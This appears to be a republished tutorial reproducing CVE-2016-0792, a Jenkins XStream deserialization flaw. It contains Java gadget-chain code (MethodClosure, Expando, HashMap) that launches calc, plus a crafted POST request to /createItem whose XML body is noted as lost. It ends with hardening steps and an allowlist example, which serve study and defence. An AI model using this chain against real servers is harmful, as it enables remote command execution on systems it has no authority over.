
How to reproduce the XStream deserialization component attack CVE-2016-0792

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

Today I will walk through how the XStream deserialization component is attacked and how CVE-2016-0792 is reproduced. Many people may not know much about this topic, so the content below is summarized to make it easier to follow. I hope you get something out of it.

What the XStream component does

XStream easily converts Java objects to and from XML documents, lets you rename specific attributes and nodes, and also supports JSON conversion.

It has the following characteristics:

Easy to use - XStream's API provides a high-level facade that simplifies common use cases.

No mappings required - XStream provides default mappings for most objects, so most serialization needs no configuration.

Performance - XStream is fast with a low memory footprint, and is suitable for large object graphs or systems.

Clean XML - XStream produces clean, compact XML that is easy to read.

No need to modify objects - XStream serializes internal fields, including private and final fields, and supports non-public and inner classes. A default constructor is not required.

Full object graph support - XStream preserves duplicate references encountered in the object model and supports circular references.

Customizable conversion strategies - custom strategies can be registered to change how specific types are represented as XML.

Security framework - XStream provides fine-grained control over the types that may be unmarshalled, to prevent security issues caused by manipulated input.

Error messages - when an exception occurs because of malformed XML, XStream throws a uniform exception with a detailed diagnosis to help resolve the problem.

Alternative output formats - XStream supports other output formats, such as JSON.

It is worth noting that when XStream converts objects, the objects do not need to implement the Serializable interface. This greatly widens the set of classes usable in a deserialization attack.

The simple serialization code for XStream is as follows:

```java
@Test
public void testWriter() {
    // Person is a simple bean with name, age and address fields
    Person person = new Person();
    // Set the properties using the setter methods
    // Note: This can also be done with a constructor.
    // Since we want to show that XStream can serialize
    // even without a constructor, this approach is used.
    person.setName("Jack");
    person.setAge(18);
    person.setAddress("whu");
    // Serialize the object
    XStream xs = new XStream();
    // Write to a file in the file system
    try {
        String filename = "./person.txt";
        FileOutputStream fs = new FileOutputStream(filename);
        xs.toXML(person, fs);
    } catch (FileNotFoundException e1) {
        e1.printStackTrace();
    }
}
```

As you can see, XStream easily converts a Java object into an XML file, producing the following (the root element is actually the fully qualified class name of Person; the package is omitted here):

```xml
<Person>
  <name>Jack</name>
  <age>18</age>
  <address>whu</address>
</Person>
```

You can just as easily deserialize the XML file back into a Java object:

```java
@Test
public void testReader() {
    XStream xs = new XStream(new DomDriver());
    Person person = new Person();
    try {
        String filename = "./person.txt";
        File file = new File(filename);
        FileInputStream fis = new FileInputStream(filename);
        // System.out.println(filename);
        System.out.println(FileUtils.readFileToString(file));
        // Populate the existing object from the XML stream
        xs.fromXML(fis, person);
        // print the data from the object that has been read
        System.out.println(person.toString());
    } catch (FileNotFoundException ex) {
        ex.printStackTrace();
    } catch (IOException e) {
        e.printStackTrace();
    }
}
```

Discovering the Sink

Every exploit needs a sensitive sink: a class or function whose job is to execute commands, read or write files, or perform some other sensitive operation that an attacker can turn to their purpose. The sink in this vulnerability is the MethodClosure class:

```java
/**
 * Represents a method on an object using a closure which can be invoked
 * at any time
 */
public class MethodClosure extends Closure {
    private String method;

    public MethodClosure(Object owner, String method) {
        // constructor, passing in the object and method name
        super(owner);
        this.method = method;
        final Class clazz = owner.getClass() == Class.class ? (Class) owner : owner.getClass();
        maximumNumberOfParameters = 0;
        parameterTypes = new Class[0];
        List methods = InvokerHelper.getMetaClass(clazz).respondsTo(owner, method);
        for (MetaMethod m : methods) {
            if (m.getParameterTypes().length > maximumNumberOfParameters) {
                Class[] pt = m.getNativeParameterTypes();
                maximumNumberOfParameters = pt.length;
                parameterTypes = pt;
            }
        }
    }

    public String getMethod() {
        return method;
    }

    protected Object doCall(Object arguments) {
        // call any method (method) of any object (owner)
        return InvokerHelper.invokeMethod(getOwner(), method, arguments);
    }

    public Object getProperty(String property) {
        if ("method".equals(property)) {
            return getMethod();
        } else return super.getProperty(property);
    }
}
```

From the class description, MethodClosure exists to call a method on an object, and it extends Closure. Its doCall method uses reflection to invoke any method on the object we supply, and both the object and the method name are passed in through the constructor. Now look at the parent class, Closure:

```java
public V call() {
    final Object[] NOARGS = EMPTY_OBJECT_ARRAY;
    return call(NOARGS);
}

@SuppressWarnings("unchecked")
public V call(Object... args) {
    try {
        // dispatches to the subclass's doCall via the meta class
        return (V) getMetaClass().invokeMethod(this, "doCall", args);
    } catch (InvokerInvocationException e) {
        ExceptionUtils.sneakyThrow(e.getCause());
        return null; // unreachable statement
    } catch (Exception e) {
        return (V) throwRuntimeException(e);
    }
}
```

Calling the parent class's call method automatically invokes the subclass's doCall method. The following code therefore pops up the calculator:

```java
MethodClosure methodClosure = new MethodClosure(new java.lang.ProcessBuilder("calc"), "start");
methodClosure.call();
```

Note: the method's arguments (args) cannot be controlled this way; the invocation can only go through call() with no parameters, which limits exploitation. An exploit needs an object with a useful no-argument method.

Automatic triggering

The Expando class contains a call to Closure.call, inside its hashCode method:

```java
/**
 * This allows hashCode to be overridden by a closure field method attached
 * to the expando object.
 *
 * @see java.lang.Object#hashCode()
 */
public int hashCode() {
    Object method = getProperties().get("hashCode");
    if (method != null && method instanceof Closure) {
        // invoke overridden hashCode closure method
        Closure closure = (Closure) method;
        closure.setDelegate(this);
        Integer ret = (Integer) closure.call(); // call dangerous method
        return ret.intValue();
    } else {
        return super.hashCode();
    }
}
```

And the common HashMap class calls hashCode on every key it stores:

```java
public V put(K key, V value) {
    if (key == null)
        return putForNullKey(value);
    int hash = hash(key.hashCode()); // call key's hashCode method
    int i = indexFor(hash, table.length);
    for (Entry<K,V> e = table[i]; e != null; e = e.next) {
        Object k;
        if (e.hash == hash && ((k = e.key) == key || key.equals(k))) {
            V oldValue = e.value;
            e.value = value;
            e.recordAccess(this);
            return oldValue;
        }
    }
    modCount++;
    addEntry(hash, key, value, i);
    return null;
}
```

The following test shows the payload being triggered automatically, with no explicit call():

```java
@Test
public void testExploit() {
    Map map = new HashMap();
    Expando expando = new Expando();
    MethodClosure methodClosure = new MethodClosure(new java.lang.ProcessBuilder("calc"), "start");
    // methodClosure.call();
    // the closure becomes the Expando's hashCode property ...
    expando.setProperty("hashCode", methodClosure);
    // ... and HashMap.put calls key.hashCode(), which calls the closure
    map.put(expando, 123);
}
```

Reproducing CVE-2016-0792

Many applications use the XStream library, and Jenkins is one of them. CVE-2016-0792 is used below as the example to reproduce.

First, install Jenkins. Version 1.642.1 is used here; other versions can be downloaded separately.

(http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war)

Run the downloaded war package from the command line. A local Java environment is required.

```shell
java -jar C:\Users\Administrator\Desktop\jenkins.war
```

When it finishes starting, visit http://ip:8080. If the page opens, the installation succeeded.

Click "New", capture the resulting GET request with Burp, and convert it into a POST request.

In Burp, construct the following request on the attacking machine:

```http
POST /createItem?name=foo HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://192.168.92.150:8080/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.92.150:8080
Cookie: JSESSIONID.45f4c58a=15p7yy31dzajd1dtooqm83m4ow; screenResolution=1718x926
Connection: keep-alive
Content-Type: text/xml
Content-Length: 895

hashCode calc false000start 123
```

(The XML element tags of the request body were lost when the page was extracted; only its text values survive.)

The calculator program pops up on the target machine.

Exploitation conditions

1. Permission restrictions:

Whether the user is anonymous or logged in, it must hold two permissions: Overall read permission and Job create permission (more permissions do not hurt; an administrator already has every permission, so that case is not considered here). The vulnerability goes through the createItem API used to create a job, so create permission is required, and Overall read is the most basic Jenkins permission, without which the user can see nothing at all.

2. Version restrictions:

Jenkins versions below 1.650 (version 1.650 fixed the issue).

3. POST data content type:

When the malicious XML document is sent to the server interface, the Content-Type must be XML.

Hardening

Update Jenkins to version 1.650 or later.

Apply access control to Jenkins and do not expose it from the internal network to the public internet.

Disable anonymous access to Jenkins.

Ensure that no Jenkins account uses a weak password.
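Beyond the Jenkins-level measures above, an application that embeds XStream itself can close the root cause with the security framework mentioned in the feature list: an allowlist so that fromXML only instantiates the types the application expects. The following is an added example, not code from the original post or from Jenkins; it assumes a Person bean with the name, age and address fields used earlier, and the ForbiddenClassException path is what stops the hashCode/MethodClosure chain before any object is built.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class HardenedXStreamDemo {

    // Assumed shape of the article's Person bean: name, age, address.
    public static class Person {
        private String name;
        private int age;
        private String address;
        public String getName() { return name; }
        public void setName(String n) { name = n; }
        public int getAge() { return age; }
        public void setAge(int a) { age = a; }
        public String getAddress() { return address; }
        public void setAddress(String a) { address = a; }
    }

    /** XStream instance that will only instantiate the types named here. */
    public static XStream hardenedXStream() {
        XStream xs = new XStream(new DomDriver());
        xs.addPermission(NoTypePermission.NONE);              // start from "deny everything"
        xs.addPermission(NullPermission.NULL);                // allow null values
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES); // int, boolean, ... and wrappers
        xs.allowTypes(new Class[] { Person.class, String.class });
        xs.alias("person", Person.class);                     // short root element instead of FQCN
        return xs;
    }

    public static void main(String[] args) {
        XStream xs = hardenedXStream();

        // Legitimate document: only allowlisted types, unmarshals normally.
        Person p = (Person) xs.fromXML(
            "<person><name>Jack</name><age>18</age><address>whu</address></person>");
        System.out.println(p.getName() + " " + p.getAge() + " " + p.getAddress());

        // Hostile document: its root names a class outside the allowlist. XStream refuses
        // while resolving the element name, so no constructor or hashCode ever runs. The
        // same rejection hits every other class a gadget chain would need.
        try {
            xs.fromXML("<java.lang.ProcessBuilder/>");
        } catch (ForbiddenClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

XStream 1.4.18 and later ship with an allowlist enabled by default, but the explicit configuration above is what makes the intended types visible in code review.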

After reading the above, do you understand better how the XStream deserialization component is used to exploit CVE-2016-0792? If you want to learn more, please follow the industry information channel. Thank you for your support.
